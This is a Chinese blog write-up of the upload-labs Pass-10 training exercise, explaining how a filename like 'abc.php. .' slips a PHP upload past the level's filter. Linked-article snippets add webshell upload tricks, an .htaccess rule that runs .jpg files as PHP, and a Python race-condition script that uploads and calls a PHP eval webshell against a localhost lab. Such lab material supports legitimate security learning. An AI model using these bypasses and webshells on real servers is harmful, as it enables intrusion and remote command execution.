upload-labs pass-10

最新推荐文章于 2025-12-16 12:53:59 发布
原创 最新推荐文章于 2025-12-16 12:53:59 发布 · 253 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

这关源码可以看到,过滤了很多,大小写,空格,点,::DATA,那我们该怎么绕过呢。

        这里我们可以使用Apache的解析漏洞、00截断绕过以及特殊字符组合绕过,当然,这里重点介绍组合绕过。解析漏洞和00截断在之前的关卡使用过,后续也还有这类题目,我们多介绍一种思路。

        我们观察源码可以发现,它的处理逻辑是先删除文件末尾的点,然后提取最后一个点后面的字符作为需要检测的后缀,然后转为小写,去除::DATA字符串,最后去空。既然它只处理一次,那么我们可以多输入一些特殊字符,下面有输入abc.php. .的解析过程。

处理过程

1. 初始文件名

$file_name = "abc.php. ."

2. 删除末尾的点 deldot($file_name)

$file_name = deldot($file_name); // "abc.php. ." → "abc.php. "

这个函数只删除文件名末尾的点,所以最后一个点被删除,但中间的点保留。

3. 提取扩展名

$file_ext = strrchr($file_name, '.'); // ". "

strrchr 查找最后一个点号的位置,返回 .(点+空格)

4. 转换为小写

$file_ext = strtolower($file_ext); // ". "

仍然是 .(点+空格)

5. 去除 ::$DATA

$file_ext = str_ireplace('::$DATA', '', $file_ext); // ". "

没有 ::$DATA,保持不变。

6. 首尾去空

$file_ext = trim($file_ext); // "."

关键步骤trim 去除了空格,现在 $file_ext = "."

所以,我们还是burp抓包然后修改文件名来绕过。

上传后我们可以直接访问这个文件。

解题点:特殊字符组合绕过。

upload-labs Pass-08
wanggonghanfei的博客
10-21 493
利用这一点,我们可以上传我们的shell,然后抓包,在包中修改文件后缀添加一个点,来达到绕过。在windows环境下,假设我们新建一个1.php文件,然后在文件后缀加一个。windows会默认去掉那个点,变成1.php。file_name);//删除文件名末尾的点。发现相较于之前关卡,缺少了。
upload-labs Pass-15
wanggonghanfei的博客
10-23 349
根据源码分析,本关卡任然可以使用图片制作的webshell。利用文件包含漏洞直接访问,详细步骤可以查看我。制作图片木马,然后直接上传,准备文件info.php。
upload-labs pass-13
记录自己学习安全知识的笔记, 沉淀ing
10-15 201
这里注意,直接提交是没有作用的,因为POST提交的数据不一致,它还会把我们提交的请求转为十六进制编码提交,我们还需要修改Hex里的内容。我们然后点进旁边的Hex,进行修改。这一关和上一个类似,不过这里是通过POST控制上传路径,我们还是上传一个文件,然后在burp里面改包。找到我们添加的后缀,31,然后在右边的面板中将Code值改为00,然后点击应用就可以了。我们将save_path路径修改一下,后面的1是为了方便定位文件结尾位置。post型00截断,需要再Hex中修改内容。
upload-labs pass-16
weixin_54347738的博客
09-05 339
建议将文件都写在D盘下,否则后面会因为权限问题无法再16进制编辑器中修改文件字段。
网络安全upload-labs Pass-19 解题详析
等风来
08-23 5913
本文介绍了如何通过修改myupload.php文件中的代码,利用图片码绕过文件上传限制,上传含有eval代码的GIF文件,并通过文件包含功能点实现命令执行。文章详细描述了上传过程、获取图片路径、利用文件包含功能点执行命令的步骤,并提供了POC示例。此外,文章还提到可以通过条件竞争的方式完成该任务,并提供了相关参考链接。读者可参考相关专栏和文章,进一步学习网络安全攻防实战技巧。
upload-labs Pass1-20 已完结
weixin_46099552的博客
08-14 502
upload-labs
网络安全upload-labs Pass-15 解题详析
等风来
08-16 5673
使用getimagesize()函数获取图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度,并将其取出的文件类型信息$info[2]与文件后缀白名单进行对比,判断上传的文件是否合法,并将info[2]作为上传后的文件的后缀名。其它操作同Pass-14,本文不再赘述。于是我们仍可以使用图片码上传。
网络安全upload-labs Pass-14 解题详析
等风来
08-16 6017
可知其检测了文件头信息,此时仅抓包修改文件后缀名不可绕过。将1.php与1.png合并为shell.php即可。需写出文件所在路径及期望得到的文件路径。故文件包含、传参执行命令成功。成功得到shell.png。
网络安全upload-labs Pass-18 解题详析
等风来
08-23 5966
作用为:fopen(“info.php”, “w”) 使用写入模式(w)打开了一个名为 info.php 的文件,然后,fputs() 函数将 <?> 写入到打开的文件中。的原理类似,我们可以在上传文件的一瞬间访问该文件,这样文件就无法被过滤及二次渲染。但利用条件竞争时,需要快速进行访问,而手工较慢,因此需要写特定的脚本进行访问或上传。可以知道,后端逻辑代码先上传文件,再进行过滤及二次渲染。说明info.php成功生成,同时该文件包含一句话木马。在点击开始攻击的一瞬间,访问目标文件路径。
upload-labs通关指南
01-22
Pass-06至Pass-10则探讨了各种不同的文件名后缀校验绕过技术,包括大小写绕过、空格绕过、点号绕过、::$DATA绕过和拼接绕过。这些技术利用了Windows系统对于文件名大小写不敏感、空格处理、点号处理的特性,以及特定...
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
2023年全国网络安全行业职业技能大赛-电子数据取证分析师-初赛C卷(15号)-Writeup
Aluxian_的博客
12-11 493
总体要求:根据提供的检材,完成指定电子数据提取。
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 886
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
Web安全】SSRF
qinjilll的博客
12-12 955
SSRF漏洞分析与防御 SSRF(服务器端请求伪造)是一种由服务端发起恶意请求的安全漏洞,允许攻击者访问与服务器相连的内网系统。漏洞成因主要是服务端未对目标地址进行过滤限制,常见于社交分享、在线翻译、图片加载等功能点。 漏洞利用方式包括: 探测内网存活主机和开放端口 利用file协议读取本地敏感文件 访问内网未授权服务(如Redis、MySQL) 结合其他漏洞实现命令执行 防御措施: 白名单限制:仅允许访问可信域名/IP和协议 输入校验:过滤特殊字符,校验IP归属 内网服务加固:禁用未授权访问,设置强密码
PolarCTF网络安全2025冬季个人挑战赛 wp
lpppp小公主的博客
12-09 983
PolarCTF网络安全2025冬季个人挑战赛复现
【要闻周报】网络安全与数据合规 12-13
专注于制造仓库、生产线边仓、物流仓储等人工拆零拣选辅助系统以及前沿技术。
12-13 609
十部门联合发布《关于推动物流数据开放互联有效降低全社会物流成本的实施方案》、网信部门从严整治利用AI仿冒公众人物开展直播营销问题乱象、工信部通报39款App(SDK)存在侵害用户权益行为、某科技公司因未及时修复安全漏洞被网警依法处罚、北京拟将自贸区数据出境负面清单推广应用到北京全市、欧盟:EDPS发布《AI风险管理指南》、中国香港:PCPD完成对两间教育机构个人资料系统的视察
基于图神经网络+大模型的网络安全APT检测系统:从流量日志到攻击链溯源的实战落地
最新发布
qq_74383080的博客
12-16 565
本文提出了一种基于图神经网络(GNN)和大型语言模型(LLM)的高级持续性威胁(APT)检测系统。该系统通过构建"主机-进程-网络"异构图,利用GraphSAGE识别异常行为模式,并结合LogsBERT进行语义分析,最后通过LLM生成攻击链报告。实际部署结果显示,该系统将APT检出率从传统方法的15%提升至97.3%,误报率从120次/天降至3次/天,攻击溯源时间从8小时缩短至25分钟。
网络安全-SQL注入
m0_56970656的博客
12-11 385
SQL注入是一种常见的网络安全攻击技术,攻击者通过在用户输入的数据中插入恶意的SQL代码,欺骗后端数据库执行非预期的操作。这种攻击通常发生在应用程序未对用户输入进行充分验证或过滤的情况下,导致数据库被非法访问、篡改或泄露敏感信息。
upload-labs pass21
07-20
upload-labs 项目中,Pass-21 的解题思路主要围绕文件上传时的 **MIME 类型验证绕过** 和 **文件名解析漏洞利用**。虽然未在提供的引用中直接提及 Pass-21 的具体细节,但根据 upload-labs 系列的常见设计逻辑,Pass-21 很可能涉及以下攻击模式: ### 三级标题:MIME 类型验证绕过 在某些关卡中,服务器会通过检查上传文件的 MIME 类型来阻止非图片文件的上传。攻击者可以通过在上传请求中修改 `Content-Type` 字段来绕过该检查,例如将其设置为 `image/jpeg` 或 `image/png`,即使上传的是 `.php` 文件。这种方式常用于绕过前端或服务器端的简单 MIME 类型检测机制[^1]。 ### 三级标题:双重扩展名上传与解析漏洞 服务器端可能使用了不安全的文件名处理方式,例如仅过滤了 `.php` 扩展名,但未对多个扩展名进行处理。攻击者可以尝试上传类似 `shell.php.jpg` 的文件,随后通过某些方式(如 Apache 的解析特性)使服务器将 `.php.jpg` 文件当作 PHP 脚本执行。这种攻击方式依赖于服务器配置不当,例如 Apache 的 `mod_php` 模块会解析最后一个匹配 `.php` 的扩展名。 ### 三级标题:结合 .htaccess 文件实现解析绕过 如果服务器允许上传 `.htaccess` 文件,则攻击者可以上传一个自定义的 `.htaccess` 文件,配置其将特定扩展名(如 `.jpg`)解析为 PHP 脚本。例如,添加如下内容: ```apache AddType application/x-httpd-php .jpg ``` 上传后,再上传一个以 `.jpg` 结尾的 PHP 文件,服务器会将其当作 PHP 脚本执行。这种方式常见于 Linux 环境下的 upload-labs 关卡[^3]。 ### 三级标题:条件竞争与多线程上传 在某些情况下,服务器可能对上传后的文件进行异步检查或清理,攻击者可以利用时间差进行条件竞争攻击。通过并发脚本快速上传并访问恶意文件,从而在文件被删除前完成命令执行。例如使用 Python 脚本进行多线程上传和访问: ```python import threading import requests def upload_file(): url = "http://localhost/upload-labs-master/upload.php" files = {'file': ('shell.php', "<?php @eval($_POST['cmd']); ?>", 'image/jpeg')} data = {'submit': 'Upload'} while True: requests.post(url, files=files, data=data) def access_file(): while True: requests.get("http://localhost/upload-labs-master/uploads/shell.php") threads = [] for _ in range(10): t = threading.Thread(target=upload_file) t.start() threads.append(t) for _ in range(2): t = threading.Thread(target=access_file) t.start() threads.append(t) ``` 此脚本通过并发上传和访问,尝试在服务器清理文件前完成攻击过程。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forfun_tt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值